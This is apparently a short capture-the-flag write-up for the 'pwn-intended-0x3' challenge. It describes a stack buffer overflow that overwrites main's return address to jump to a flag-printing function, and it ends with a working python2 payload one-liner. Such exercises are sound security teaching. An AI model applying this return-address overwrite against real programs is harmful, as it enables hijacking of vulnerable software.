This is exactly same as coffer-overflow-2 from redpwn-2020.
In this case the return address of main has to be replaced with the address of a function called
flag (which prints the flag).
flag with the starting address:
0x00000000004011ce: push rbp
Using gdb, the distance between the starting address of the buffer and the return address of main in the stack was found to be 40 bytes (rbp + 8 bytes), so we can have some padding of 40 bytes and then have the address of
flag function in little endian. This worked:
python2 -c "print 'A'*40 + '\xce\x11\x40\x00\x00\x00\x00\x00'" | ./pwn-intended-0x3